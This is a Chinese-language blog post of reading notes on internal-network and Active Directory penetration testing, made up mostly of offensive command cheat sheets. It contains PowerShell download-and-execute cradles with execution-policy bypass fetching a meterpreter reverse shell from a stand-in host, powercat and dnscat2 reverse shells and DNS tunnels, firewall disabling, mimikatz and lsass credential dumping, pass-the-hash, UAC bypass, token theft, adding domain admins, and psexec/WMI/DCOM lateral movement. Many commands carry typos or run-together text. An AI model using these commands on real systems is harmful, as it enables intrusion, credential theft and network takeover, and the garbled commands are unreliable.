内网安全读书笔记

syst1m — Mon, 24 Feb 2020 04:21:02 +0000

内网安全读书笔记

内网渗透测试基础

局域网(Local Area NetWork LAN)
工作组(Work Group)
域(Domain)

活动目录主要提供以下功能

账号集中管理
软件集中管理
环境集中管理
增强安全性（统一杀毒等）
更可靠、更短的宕机时间

安全域的划分

划分安全域的目的是将一组安全等级相同的计算机划入同一个网段。

网络访问控制策略（NACL）
DMZ（隔离区）

主机平台常用工具

Kali LInux

Wce(windows平局管理器->列出登陆会话、添加修改列出和删除关联凭据(LM Hash、NTLM hash、明文密码和kerberos票据))

mimikatz

Responder（不仅用于嗅探网络内所有的LLMNR 和获取主机的信息、还提供多种渗透测试环境和场景、包括https、SMB、sql server、ftp、ldap、POP3等）

DSHash(从NTDSXtract中提取用户的易于理解的散列值)

Nishang

Empire

ps_encoder.py(使用base64编码封装的powershell命令包)

smbexec(使用Samba工具的快速Psexec类工具)

后门制造工厂

Veil

Cobalt Strike

Windows

nmap 
wireshark
putty
sqlmap
burp
hydra

Getif(收集snmap设备信息)

Cain&&Abel(密码恢复工具、通过嗅探网络，破解加密密码，恢复无线网络密钥显示密码框、发现缓存中的密码、分析路由信息、恢复各种密码和凭据)

Powershell

Get-help/$PSVersionTable.PSVERSION 查看powershellb版本

Get-Executionpolicy 查看执行策略
Restricted 脚本不能运行默认
RemoteSigned 本地可以运行
Allsigned 当脚本由受信任的发布者签名时运行
Unrestricted 允许所有脚本运行

Set-ExecutionPolicy XX 设置执行策略

常用参数

-ExecutionPolicy Bypass (-Exec Bypass) 绕过执行安全策略

-WindowsStyle Hidden 隐藏窗口

-NonInteractive (-NonI) 非交互模式

-noexit 执行后不退出shell
-NoLogo 启动不显示版权表示的powershell

-enc 允许传入一个base64编码过的powershell脚本字符串作为参数

绕过本地权限并执行

Powershell.exe -ExecutionPolicy Bypass -File PowerUp.ps1 命令行环境下绕过本地权限执行

powershell.exe -exec bypass -Command "& {import-Module C:\syst1m.ps1; Invoke-AllChecks}"
目标本地执行脚本

下载网络上脚本绕过本地权限执行

Powershell.exe -ExecutionPolicy Bypass-WindowStyle Hidden-NoProfile-NonIIEX(New-ObjectNet,WebClient).DownloadString("xxx.ps1");[Parameters]

Powershell.exe -ExecutionPolicy Bypass-WindowStyle Hidden-NoProfile-NonIIEX(New-ObjectNet,WebClient).DownloadString("http://xxx.com/ps.ps1"); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.1.1 -lport 80

使用base64混淆

echo "IEX(New-ObjectNet,WebClient).DownloadString("http://xxx.com/ps.ps1"); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.1.1 -lport 80 -Force" >raw.txt 

chmod +x ps_encode.py

./ps_encode.py -s raw.txt

Powershell.exe -NoP -NonI -W Hidden -Exec Bypass -enc xxxx

内网信息搜集

收集本机信息

ipconfig /all 获取本机网络配置信息
systeminfo | finder /B /C:"os Version" 操作系统和版本信息

echo %PROCESOR_ArCHITECTURE% 系统系统结构

wmic_product_get_name,version 结果输出到文本

Powershell.exe "Get-WmiObject -class Win32_Product | Select-Object -Property name,version" powershell收集

wmic service list brief 查询本机服务信息

tasklist 当前进程和进程用户

wmic process list brief 进程信息

wmic startup get command,caption 查看启动程序信息

schtasks /query /to LIST /V 查看计划任务

net statistics workstation 查看主机开机时间

net user 查看用户列表

net localgroup administrators 获取本地管理员信息

query user || qwinsta

netstat -ano 查询端口列表

systeminfo 查询补丁列表
wmic qfe get Caption,Descript,HotFixID,InstalledOn 查询补丁

net share 查询本机共享列表
wmic share get name,path,status

route print 查询所有可用接口的ARP缓存表
arp -a

查询防火墙相关配置

netsh firewall set opmode disable 关闭防火墙（03之前）

netsh advfirewall set allprofiles state off（关闭防火墙 03之后）

netsh firewall show config 查看防火墙配置

netsh firewall add allowedprogram c:\nc.exe "allow nc" enable(03之前允许指定程序全部连接)

netsh advfirewall firewall add rule name="pass nc" dir=in action=allow programe="C:/nc.exe"(允许指定程序进入（03之后）)

netsh advfirewall add rule name="Allow nc" dir=out action=allow program="c:\nc.exe"(03之后允许指定程序退出)

netsh advifirewall firewall add rule name="Remote Desktop" protocol=Tcp dir=in localport=3389 action=allow 允许3389放行

netsh advifirewall firewall set currentprofile logging filename "C:\windows\temp\fw.log" 自定义防火墙日志存储位置

查看代理配置情况

reg query "HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Internet Setting" 查看127.0.0.1 1080端口情况

查询并开启远程连接服务

REG QUERY "HKEY_LOCAL_MACHINE|SYSTEM|CurrentControlSet\Control\TerminalServer|WinStation\RDP-TCP" /V PortNumber 查看远程连接端口

WMic path win32_terminalservicesetting where (__CLASS !="") call setallowtsconnections 1 03开启3389

server08和12开启远程连接
Wmic /namespace:\\root\cimv2\terminalservices path win32_terminalservicesetting where call setallowtsconnections 1

Wmic /namespace:\\root\cimv2\terminalservices path win32_tsgeneralsetting where (TerminaName='RDP-TCP') call setallowtsconnections 1

red add "HKLM\SYSTEM\CURRENT|CONTROLSET\CONTROL\TERMINAL SERVER" /V fSingleSessionPerUser /t REG_DWORD /d 0 /f

自动收集信息

http://www.fuzzysecurity.com/scripts/files/wmic_info.rar

wmic脚本自动收集

Empire

usemoudle situational_awareness/host/winenum 本机用户、域组成员、密码设置时间、共享信息等

situational_awareness/host/computerdetails 模块包含了系统中所有有用的信息

查询当前权限

查询当前权限

whoami 查看当前权限
whoami /all 查询sid
net user XXX /domain 查询指定用户信息

判断是否存在域

ipconfig /all

查看系统详细信息

systeminfo

查询当前登陆域及用户信息

net config workstation

判断主域

net time/domain

探测域内存活主机

NetBIOS

nbt.exe 192.168.1.1

ICMP

for /L %I in (1,255) Do @ping -W l -n 192.168.1.%I | findstr "TTL="

arp.exe -t 192.168.1.0/20
arp-scan工具

usemodule situational_awarencess/network/arpscan Empire

powershell.exe -exec bypass -Command "& {Import-Moudle c:\arpsacan.ps1};Invoke-Arpscan -CIDR 192.168.1.0/20}" >> c:\log.txt Nishang中的Invoke-ARPScan.ps1

常规TCP/UDP

ScanLine

扫描域内端口

telnet
S扫描器
Metasploit

auxiliary/scanner.portscan/tcp

PowerSploit的INvoke-portscan.ps1脚本

powershell.exe -nop -exec -bypass -c "IEX(New-ObjectNet.Webclint).DownloadString('http:xxx.com/a.ps1');Invoke-Portscan"

Nishang的Invoke-PortScan模块

Invoke-Portscan -StartAddress 192.168.250.1 -EndAddredd 192.168.250.255 -ResolveHost

收集域内信息

net view /domain 查询域

net view /domain:HACKE

net group /domain 用户组列表

net group "domain computer" domain 查询所有域成员计算机列表

net accounte /domain 域密码策略

nltest /domain_trusts 域信任信息

查找域控制器

查看域控制器机器名

nltest /DCLIST:hacke

查看域控制器主机名

NSlookup -type=SRV _ldap._tcp

查看当前时间

net time /domain

查看域控制器组

net group "Domain Controllers" /domain

域控制器机器名

netdom query pdc

获取域内用户和管理员信息

查询所有域用户列表

net user /domain

获取域内用户的详细信息

wmic useraccount get /all

查看存在的用户

dsquery user

常用dsquery命令

dsquery computer 查找目录中的计算机
contact 联系人
subnet 子网
group 组
ou 组织单位
site 站点
server  AD DC/LDS实例
user 用户
quota 配额规定
partition 分区
* 任何对象

查询本地管理员用户

net localgroup administrators

查询域管理员用户

net group "domain admins" /domain 域管理员用户

net group "ENterprise Admins" /domain 管理员用户组

定位域管理员

net session 看谁使用了本地资源

psloggedon.exe
PVEFindADUser.exe
netsess.exe
hunter
Netview
PowerView

psloggedon.exe

原理检查HKEY_USERS的key

下载地址
https://docs.microsoft.com/en-us/sysinternals/downloads/psloggedon

psloggedon [-] [-l] [-x] [computer|username]

psloggedon \\DC

PVEFindADUser.exe

下载地址
https://github.com/chrisdee/Tools/tree/master/AD/ADFindUsersLoggedOn

-current/-current['username'] 所有用户
-last/-last['username'] 最后登陆用户

PVEFindADUser.exe -current

netview.exe(绝大部分功能无需管理员权限)

下载地址
https://github.com/mubix/netview

netview.exe 参数

-f filename.txt 指定要提取主机列表的文件
-e filename.txt 指定要排除的主机名的文件
-o filename.txt 将所有输出重定向到指定的文件
-d domain 指定要提取主机列表的域
-g group 指定要锁搜的组名
-c 对已找到的共享目录/文件的访问权限进行检查

Nmap的nes脚本(无需管理员权限)

下载地址
https://nmap.org/nsedoc/scripts/smb-enum-sessions.html

PowerView

下载地址
https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView

Invoke-StealthUserHunter 
Invoke-UserHunter

Empire

usemoudle situational_awareness/network/powerview/user_hunter

查找域管理员

本机检查

net group "Domain Admins" /domain 获取域管理员列表

tasklist /v 列出本机所有进程及进程用户

查询域控制器的域用户会话

net group "Domain Controllers" /domain 查询域控制器列表

net group "Domain Admins" /domain收集域管理员列表

收集所有活动域的会话列表

NetSess -h

交叉引用域管理员列表与活动会话列表

确定哪些IP地址有活动域令牌

1.域控制器列表dcs.txt 域管理员列表sessions.txt

FOR /F %i in (dcs.txt) do @echo [+] Querying DC %i && @netsess -h % i 2>null >sessions.txt && FOR /F %a in (admins.txt) DO @type sessions.txt | @findstr /I %a

2.脚本

https://github.com/nullbind/Other-Projects/tree/master/GDA

查询远程系统中运行的任务（通过共享的本地管理员账户运行）

net group "Domain Admins" /domain 查询与管理员列表

目标域系统列表添加到ips.txt文件中
收集的域管理员列表添加到names.txt中

FOR /F %i (ips.txt) DO @echo [+] %i && @tasklist /V /S %i /U user /P password 2>NUL >output.txt && FOR /F %n in (names.txt) DO @type output.txt | findstr %n >NUL && echo [!] %n was found running a process on %i && pause

扫描远程系统的NetBIOS信息

域系统列表 ips.txt
域管理员列表 admins.txt

for /F % i in (ips.txt) do @echo [+] Checking % i && nbtstat -A %i 2>NUL >nbsessions.txt && FOR /F %n in (admins.txt) DO @type nbsessions.txt | findstr /I %n >NUL &&echo [!] %n was found logged into %i

Nbtscan工具
for /F % i in (ips.txt) do @echo [+] Checking % i && nbtscan -f %i 2>NUL >nbsessions.txt && FOR /F %n in (admins.txt) DO @type nbsessions.txt | findstr /I %n >NUL &&echo [!] %n was found logged into %i

域管理员模拟方法

Incognito

PowerView

下载地址
https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1

Get-NetDomain 获取当前用户所在域的名称
Get-NetUser 获取所有用户的详细信息
Get-NetDomainController 获取所有域控制器的信息
Get-NetComputer 获取域内所有机器的详细信息
Get-NetOU 获取域中的OU信息
Get-NetGroup 获取所有域内组和组成员信息
Get-NetFileServer 根据spn获取当前域使用的文件服务器信息
Get-NetShare 获取域内所有的网络共享信息
Get-NetSession 获取指定服务器的会话
Get-NetRDPSession 获取服务器的远程连接
Get-NetProcess 获取远程主机的进程
Get-UserEvent 获取指定用户的日志
Get-ADObject 获取活动目录的对象
Get-NetGPO 获取域内所有的组策略对象
Get-DomainPolicy 获取域默认策略或控制器策略
Invoke-UserHUNter 获取域用户登陆的计算机信息以及该用户是否有本地管理员权限
Invoke-ProcessHunter 通过查询域内所有的机器进程找到特定用户
Invoke-UserEventHunter 根据用户日志查询某域用户登陆过哪些域机器

BloodHound

https://github.com/BloodHoundAD/BloodHound/releases/download/2.0.4/BloodHound-win32-x64.zip

sharphound获取BloodHound需要的信息

https://github.com/BloodHoundAD/BloodHound/blob/master/Ingestors/SharpHound.exe

SharpHound.exe -c all

敏感数据的防护

office

高版本office可通过ProcDump获取密码

隐藏通信隧道技术

隐藏通信隧道基础知识

判断内网连通性

ICMP

ping xxx.com/192.

nc -zv 192.168.1.7 80

http

curl baidu.com 80

nsllokup
nslookup www.baidu.com ip

dig
dig ww.baidu.com -A

代理情况

ping -n l -a ip

网络层隧道（ipv6、icmp）

IPV6

socat
6tunnel
nt6tunnel

ICMP

关闭本地icmp应答
Sysctl -w net.ipv4.icmp_echo_ignore_all=1

icmpsh
https://github.com/inquisb/icmpsh.git

PingTunnel
icmptunnel
powershell icmp

传输层隧道技术(tcp、udp、常规端口转发)

目标机器
lcx.exe -slave 公网主机ip 4444 127.0.0.1 3389

vps
lcx.exe -listen 4444 5555

本地端口转发
lcx -tran 53 目标主机ip地址 3389

netcat(nc)

PowerCat(nc的powershell版本)

导入

Import-Moudle powercat.ps1

nc正常连接PowerCat

目标
powercat -l -p 8080 -c cmd.exe -v 

本地
netcat 192.168.130 8080 -vv

nc反向链接PowerCat

本地
nc -l -p 8888 -vv
目标
powercat -c 192.xxx.xxx.xxx -p 8888 -v -e cmd.exe

PowerCat DNS 隧道

安装dnscat
cd dnscat2/server/
gem install bundler
bundle install

服务端
ruby dnscat2.rb ttpowercat.test -e open --no-cache

目标机

powercat -c 192.xxx.xxx.xxx -p 53 -dns ttpowercat.test -e cmd.exe

PowerCat 生成payload

powercat -l -p 8000 -e cmd -v -g >> shell.ps1 上传
powercat -c 10.xxx.xxx.xxx -p 8080 -v 监听

编码
powercat -c xxx.xxx.xxx.xxx -p 9999 -ep -ge
监听
powercat -l -p 9999 -v

应用层隧道技术

ssh

ssh参数

-C 压缩传输、提高传输速度
-f 将ssh传输转入后台执行、不占用当前的shell
-N 建立静默链接（建立了连接、但是看不到具体会话）
-g 允许远程主机连接本地用于转发的端口
-L 本地端口转发
-R 远程端口转发
-D 动态转发（SOCKS代理）
-F 指定ssh端口

本地转发


vps kali linux(192.168.1.4)
web服务器(192.168.1.11/1.1.1.16)
数据库服务器(1.1.1.10)
域控制器(1.1.1.2)

vps上
ssh -CfNg -L 1153(vps端口):1.1.1.10(目标主机):3389（访问端口）

rdesktop 127.0.0.1:1153

远程转发

web可以访问外网

vps kali linux(1.1.1.4)
web(1.1.1.200)
数据库(1.1.1.10)
域控制器(1.1.1.2)

web服务器上执行
ssh -CfNg -R 3307(vps端口):1.1.1.10（目标主机）:3389 root@192.168.1.4

rdesktop 127.0.0.1:3307

动态转发


vps kali linux(192.168.1.4)
web服务器(192.168.1.11/1.1.1.16)
数据库服务器(1.1.1.10)
域控制器(1.1.1.2)

ssh -CfNg -D 7000 root@192.168.1.11

浏览器设置代理

http/https协议

reGeorg

https://github.com/sensepost/reGeorg

python reGeorgSocksProxy.py -u http://xxx:8080/tunne;.jsp -p 9999
proxyChains 代理访问

meterpreter
tunna

DNS

查看DNS的连通性

cat /etc/resoiv.conf|grep -v '#' 查询内部域名及IP地址

nslookup hacks.testlab 内部dns连通性

nklookup baidu.com 外部dns连通性

dnscat2(支持多个会话)

https://github.com/iagox86/dnscat2

部署域名解析

创建A记录
域名A记录指向vps服务器

创建ns记录（设置子域名dns服务器的）
dnsch子域名解析结果指向域名

安装dnscat2服务端

sudo ruby ./dnscat2.rb vpn.xxx.com -e open -c syst1m.com --no-cache

sudo ruby ./dnscat2.rb --dns server=127.0.0.1,port=533.type=txt --secret=syst1m.com

目标主机安装客户端

make install 编译

dnscat.exe --ping vpn.xxx.com 测试连通性

dnscat.exe --dns domain=vpn. --secret syst1m.com

dnscat --dns server=ip,port=53,type=txt --secret=syst1m.com

powershell版本

https://github.com/lukebaggett/dnscat2-powershell

IMport-Moudle .\dnscat2.ps1或者IEX(New-Object System.Net.Webclient).DownloadString('')

开启dnscat2-powershell服务
start-Dnscat2 -Domain vpn.xxx.com --DNSServer 1.x.x.x

IEX加载脚本方式（内存中打开dnscat客户端）
powershell.exe -nop -w hidden -c (IEX(New-Object System.Net.Webclient).DownloadString(''),start-Dnscat2 -Domain vpn.xxx.com --DNSServer 1.x.x.x)

参数

exec 打开程序
download 下载文件
help 帮助
clear清屏
delay 修改远程响应延时
shell 得到一个反弹shell
kill 切断通道
listen 类似ssh -l参数 listen 0.0.0.0:53 192.168.1.1 3389
ping 用于确认机器是否在线
windows -i 连接某个通道

iodine(支持linux、mac、windows)

https://github.com/Al1ex/iodine

安装服务端

iodined -f -c -P syst1m 192.168.0.1 vpn.xxx.com -Dp

安装客户端

iodine -f -p syst1m vpn.xxx.com -M 200

使用dns隧道

mstsc 10.0.0.1:3389

SOCKS代理

EarthWorm

1.正向sockes5服务器
ew -s ssocked -l 888

2. 反弹sockes5服务器(公网vps)
ew -e rcsocks -i 1080 -e 888
ew -s rssocks - d xxx.xxx.xxx.xxx -e 888 (内网web服务器）

reGeorg
sSocks
SocksCap64
Proxifier
ProxyChains

vi /etc/proxychains.conf
cp /usr/lib/proxychains3/proxyresoly /usr/bin
proxychains firefox

压缩数据

####RAR
– 以rar格式压缩解压

压缩
rar.exe a -k -r- s -m3 E:\webs\1.rar E:|webs

解压
Rar.exe e E:\webs\1.rar

分卷压缩/解压

压缩
Rar.exe a -m0 -r -v20m E:\test.rar E:\API

解压
Rar.exe x E:\test.part01.rar e:\xl

####7-zip

普通压缩

压缩
7z.exe a -r -p12345 E:\webs\1.7z e:\webs

解压
7z.exe x -p12345 E:\webs\1.7z -oE:\x

分卷压缩

压缩
7z.exe -r -vlm -padmin a e:\test.7z E:\API

解压
7z.exe x -padmin E:\test.7z.001 -oE:\xl

上传和下载

Ftp上传

本地vps搭建ftp服务传输

VBS上传

1.输入命令
    Set Post=CreateObject("Msxm12.XMLHTTP")>>downloads.vbs
    set shell = CreateObject("Wscript.Shell")
    Post.OPen "GET","http://server_ip/target.exe",0
    Post.Send()
    Set aGet = CreateObject(ADODB.stream")
    aGet.Mode = 3
    aGet.Type = 1
    aGet.Open()
    aGet.Write(Post.responseBody)
    aGet.SaveToFile "c:\test\target.exe"

2.执行脚本
    Cscript download.vbs

利用Debug上传(只支持小于64kb文件)

kali linix位置
/usr/share/windows-binaries

转为十六进制

wine exe2bat.exe ew.exe ew.txt

Nishang

> exetotext.ps1

转换
.\ExetoText c:msf.exe c:msf.txt

下载并执行文本文件
Download_Execute http://xxx.xxx.xx.xx/msf.txt

bitsadmin(xp之后自带)
powershell下载

权限提升分析及防御

系统内核溢出漏洞提权

通过手动执行命令发现缺失补丁

补丁参考

https://github.com/SecWiki/windows-kernel-exploits

whoami /groups 查看当前权限
systeminfo 查看补丁
Wmic qfe get Caption,Description,HotFixID,INstalledOn 列出已经安装的补丁

Caption,Description,HotFixID,INstalledOn | findstr /c:"KB3143141"  /c:"KB316902" 查找指定补丁

MS16-032.ps1(KB3139914)

Invoke-MS16-032 -APPlication cmd.exe -Commandline "/c net user 1 1 /add"

Invoke-MS16-032 -APPlication cmd.exe notpad.exe

利用meatsploit发现缺失补丁

post/windows/gather/enum_patches模块

Windows Exploit Suggester

1. systeminfo 获取补丁情况
2. ./windows-exploit-suggester.py --update 下载安全公告数据库
3. pip install xlrd -upgrade 安装xlrd模块
4. ./windows-exploit-suggester.py -d xx.xls -i patches.txt

local_exploit_suggester模块（识别系统中可能被利用的漏洞）

post/multi/recon/local_exploit_suggester

powershell中Sherlock脚本

Import-Moudle c:\Sherlock.ps1
Find-AllVulns

Cobalt Strike(3.6以后)

elevate ms14-058 smb

Windows操作系统配置错误利用

系统服务权限配置错误

下载地址

PowerUp
https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1

运行脚本

powershell.exe -exec bypass -Command "& (Import_Moudle .\PowerUp.ps1; Invoke-Allcheck)"

powershell.exe -nop -exec bypass  -c "IEX (New-Object Net.Webclient).DownloadString('http://xxx.com/PowerUp.ps1'); Invoke-Allcheck"

利用C#脚本添加用户(PowerUp的Install-ServiceBinary模块)

powershell.exe -nop -exec bypass IEX (New-Object Net.Webclient).DownloadString('c:\PowerUp.ps1');Install-ServiceBinary-ServiceName '服务名' -UserName syst1m -Password syst1m

重启系统生效
利用msf

service_permissions 模块 
利用目标机器上的每一个有缺陷的服务

注册表键AlwayslnstallElevated

检测注册表键是否被设置

powershell.exe -nop -exec bypass IEX (New-Object Net.Webclient).DownloadString("c:/powerupps1");Get-RegisterAlwaysInstallElevated

生成MSI文件

Write-UserAddMSI

普通权限运行MSi文件

可信任服务路径漏洞

检测漏洞

“`
wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v """

- 检测是否有可写权限

icacls

everyone 完全控制权限（所有用户都有修改这个文件的权限）
M 修改
F 完全控制
CI 丛属容器将继承访问控制项
OI 从属文件将继承访问控制项

- 重启服务

恶意文件重命名上传

sc stop service_name
sc start service_name

- MSF模块

exploit/windows/local/trusted_service_path

set AutoRunScript migrate -f 自动迁移

#### 自动安装配置文件 >可能包含用户名密码 – 搜索配置文件

dir /b /s c:\Unattend.xml

“`

msf
post/windows/gather/enum_unattend

计划任务

查看计划任务

schtasks /query /fo LIST /v

AccessChk

http://technet.microsoft.com/ZH-cn/sysinternals/bb664922

accesschk “username” c:\windows\system32
查看username用户对c:\windows\system32目录的操作权限

找出某个驱动器下所有权限配置有缺陷的文件夹路径
accesschk.exe–uwdqsUsersc:
accesschk.exe–uwdqs"AuthenticatedUsers"c:

找出某个驱动器下所有权限配置有缺陷的文件路径
accesschk.exe–uwqsUsersc:*.*
accesschk.exe–uwqs"AuthenticatedUsers"c:*.*

accesschk.exe -uwcqv "Power Users" *  获取可以操作的服务名称信息
sc qc kdc查询kdc服务详细信息

查看某个服务的权限设置
accesschk -cv [service name]

Empire

查找系统中的漏洞

usemoudle privesc/powerup/allchecks
excute

组策略首选项提权

SYSVOL

用来存放登陆脚本、组策略数据以及其他域控制器需要的域信息等

C:\Windows\SYSVOL\DOMAIN\Policics

常见组策略首选项（GPP）

映射驱动器（Drivers.xml）
创建本地用户
数据源（DataSources.xml）
打印机配置（Printers.xml）
创建/更新服务（Services.xml）
计划任务(ScheduledTasks.xml)

组策略首选项提权

创建组策略

手动更新组策略
gpupdate

获取组策略凭据

手动查找cpassword

type \\dc\sysvol\pentest.com\Policies\{31B2F340-016D-11D2-945F-00c04FB984F9}\MACHINE\Perferences\Group\Groups.xml

解密
python gpprefdecryp.pt 密文

使用PowerShell获取cpassword

Get-GPPPassword.ps1

Metasploit

post/windows/gather/credentials/gpp

Empire

usemoudle privsec/gpp

BypassUAC（用户账户控制）

bypassuac模块

exploit/windows/local/bypassuac

Runas模块

exploit/windows/local/ask 弹窗，点击反弹shell

Nishang中的Invoke-PsUACme模块

Invoke-PsUACme -Verbose 使用sysprep方法并执行默认payload

Invoke-PsUACme -method oobe -Verbose 使用oobs方法并执行默认payload

Invoke-PsUACme -method oobe -payload "powershell -windiwstyle hidden -e YourEncodePayload" 使用-payload参数自行指定要执行的payload

Empire bypassuac模块

1.usemoudle privesc/bypassuac

2.bypassuac_wscript模块
只适用于win7

令牌窃取

令牌分类

Delegation Tokens 授权令牌 支持交互
Impersonation Tokens 非交互式

令牌窃取

拥有meterpreter shell

use incognito
list-tokens -u 列出可用令牌
impersonate_token 主机名\\用户名 假冒用户

Rotten Potato(快速模拟令牌)

https://github.com/foxglovesec/RottenPotato.git

use incognito
list-tokens -u 列出可用令牌
upload exe
execute -HC -f rottenpotato.exe
impersonate_token "NT AUTHORITY\\SYSTEM"

添加域管理员

net user shuteer abc123 /ad /domain
net group "domain admins shuteer /ad /domain"
net group "domain_admins" /domain

meterpreter

add_user shuteer abc123 -h 1.1.1.2
add_group_user "Domain Admins" shuteer -h 1.1.1.2

Empire下的令牌窃取

1.creds

查看密码

creds 查看列出来的密码

窃取令牌

pth ID (ID为credID)

查看当前进程是否有域用户进程窃取

ps 查看进程
steal_token  12004 获取令牌
revtoself 恢复令牌权限

无凭证条件下的权限获取

Responder

https://github.com/SpiderLabs/Responder.git

域内横向移动分析及防御

常用windows远程连接和相关命令

IPC

建立ipc连接

net use \\192.168.100.190\ipc$ "Aa123456@" /user:administrator

ipc$利用条件

（1）开启了135、445端口
（2）管理员开启了默认共享

ipc$失败原因

（1）用户名密码错误
（2）目标没有打开ipc$默认共享
（3）不能连接135、445端口
（4）命令输入错误

使用windows自带工具获取远程主机信息

dir命令

dir

tasklist

tsklist 列出进程

计划任务

at(08之前)

1.net time \\192.168.100.190
2.copy calc.bat \\192.168.100.190\c$
3.at \\192.168.100.190 4:11pm c:\calc.bat
4.at \\192.168.100.190 7 /delete

执行命令

at \\192.168.100.190 4:41pm cmd.exe \c "ipconfig>c:/1.txt"
type \\192.168.100.190\c$\1.txt

schtasks（08之后）

schtasks /create /s 192.168.100.190 /tn /test /sc onstat /tr c:\calc.bat /ru system /f 创建计划任务（test 计划任务名字 启动权限为system）

schtasks /run /s 192.168.100.190 / i /tn "test" 运行计划任务

schtasks /delect /s 192.168.100.190 /tn "test" /F 删除计划任务

net use 名称 /del /y 删除ipc$

windows系统散列值获取

单机密码抓取

GetPass
PwDump7
QuarksPwDump

QuarksPwDump.exe --dump-hash-local

通过SAM和system文件抓取密码

导出SAM和System文件

reg save hklm\sam sam.hive
reg save hklm\system system.hive

读取SAM和system文件获得NTLM Hash

mimikatz
lsadump::sam /sam:sam.hive /system:system hive

mimikatzz直接读取本地SAM

privilege::debug
lsadump::sam

使用mimikatz在线读取SAM文件

mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords"

使用mimikatz离线读取lsass.dmp文件

导出lsass.dmp文件

procdump.exe -accepteula -ma lsass.exe lsass.dmp

mimikatz导出散列值

sekurlsa::minidump lsass.DMP 加载文件
sekurlsa::logonPasswords full 导出密码散列

Powershell

Nishang Get-PassHashes.ps1

Import-Moudle .\Get-PassHashes.ps1
GetPassHashs

powershell远程加载mimikatz获取散列值

使用Hashcat获取密码

下载

make
make install
./hashcat -h

Hashcats使用

hashcat -b 测试当前机器基准速度
-m 指定散列值
-a number 破解模式

hashcat -a 0 -m xx

破解Windows散列值

hashcat -m 1000 -a 0 -o winpassok.txt win.hash password.lst --username

破解 WIFI握手包

aircrack-ng  -J 
hashcat -m 2500 out.hccap dict.txt

防御攻击者抓取明文密码

设置Active Directory 2012 R2功能级别

Protected User 添加<-组

安装KB2871997

安装补丁
禁用Administrator账号

修改注册表

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0  修改

reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential 查询

防止mimikatz抓密码

删除拥有debug权限的本地管理员从Administrator组中

哈希传递攻击

哈希传递攻击

mimikatz "privilege::debug" "sekurlsa::pth /user:administrator /domain:pentest.com /ntlm:D(Fxxxxxx"

使用AES-256哈希传递

(1)抓取AES-256密钥
mimikatz "privilege::debug" "sekurlsa::ekeys"

(2)哈希传递
mimikatz "privilege::debug" "sekurlsa::pth /user:administrator /domain:pentest.com /aes256:2381fXXXX"

票据传递攻击

mimikatz
(1)导出票据
mimikatz "privilege::debug" "sekurlsa::tickets /export"
kerberos::purge 清除票据
mimikatz "kerberos::ptt "c:\ticket.kirbi" 注入票据

kekeo票据传递

https://github.com/gentilkiwi/kekeo

kekeo "tgt:ask /user:administrator /domain:pentest.com /ntlm:D9F9xxxx" 生成票据
klist purge 清除票据
kerberos::ptt TGT_administrator@PENTST>COM_krbtgt.com@PENTEST.COM>kirbi

PsExec使用

psTools

https://download.sysinternals.com/files/PSTools.zip

Sysyem权限的shell(-s)

PsExec.exe -accepteula \\192.xxx.xxx.xxx -s cmd.exe

Administrator权限的

Psexec.exe -accepteula \\192.xxx.xxx.xxx cmd.exe

账号密码远程连接

psexec \\192.xxx.xxx.xxx -u administrator -p Aa123456 cmd.exe

metasploit中的psexec

exploit/windows/smb/psexec
exploit/windows/smb/psexec_psh(powershell版本)

WMI使用

基本命令

wmic /node:192.168.100.190 /user:administrator /password:Aa123456 process call create "cmd.exe /c ipconfig >ip.txt"

type \\192.xxx.xxx.xx\c$\ip.txt

impacket中的wmiexec

wmiexec.py administrator:Aa123@192.xxx.xxx

wmiexec.vbs

cscript.exe //noiogo wmiexec.vbs /shell 192.xxx.xxx.xxx administrator Aa123456@ 半交互shell

cscript.exe wmiexec.vbs /cmd 192.xxx administrator Aa123456 "ipconfig"

-wait 5000 ping/systeminfo等时间较长的命令

-persist nc等不需要结果但需要运行的程序

Invoke-WmiCommand(powerSploit工具包)

$user= "pentest\administrator"
$password = ConvertTo-SecureString -String "a123456" -AsPlainText -Force
$Cred = New-Object -TypeName System.Management.Automation.PsCredential
远程执行命令
$Remote = Invoke-WmiCommand -Payload {ipconfig} -Credential $cred - CompuerName 192.xxxx
将执行结果输出到屏幕
$Remote.PayloadOutput

Invoke-WMIMethod(powershell自带)

$user= "pentest\administrator"
$password = ConvertTo-SecureString -String "a123456" -AsPlainText -Force
$Cred = New-Object -TypeName System.Management.Automation.PsCredential
远程启动计算器
Invoke-WMIMethod -Class win32_Process -Name Create -ArgumentList "calc.exe" -ComputerName "192.xxx.xx.xxx" -Credential $cred

永恒之蓝

auxiliary/scanner/smb/smb_ms17_010

smbexec使用

C++版smbexec

下载地址

https://github.com/sunorr/smbexec

使用

test.exe ipaddress username password command netshare

(1)上传execserver
net use \\192.xxxx "Aa123" /user:pentest\adminidtrator

cpoy execserver.exe \\192.xxx\c$\windows\

(2)客户端执行命令
test.exe 192.xxx.xxx.xxx administrator Aa123456 whoami c$

impacket工具包中的smbexec.py

smbexec.py
smbexec.py pentest/administrator:Aa123456@192.168.xxx.xxx

Linux跨windows远程执行命令

下载地址

https://github.com/brav0hax/smbexec

DCOM在远程系统中的使用(分布式组件对象模型)

本地DCOM执行命令

获取DCOM程序列表

Get-CimInstance Win32_DCOMApplication win12以上

Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_DCOMApplication win7、08

使用DCOM执行任意命令

本地启动计算器
$com = [activator]::CreateINstance([type]::GetTypeFromProgiD("MMC20.Application",'127.0.0.1"))
$com.Document.ActiveView.ExecuteShellCommand('cmd.exe',$null,"/c calc.exe","Minimzed")

远程机器执行命令

net use \\192.168.100.205 "a123456" /user:pentest.com\syst1m

$com = [activator]::CreateINstance([type]::GetTypeFromProgiD("MMC20.Application",'127.0.0.1"))

$com.Document.ActiveView.ExecuteShellCommand('cmd.exe',$null,"/c calc.exe","Minimzed")

SPN

SPN扫描

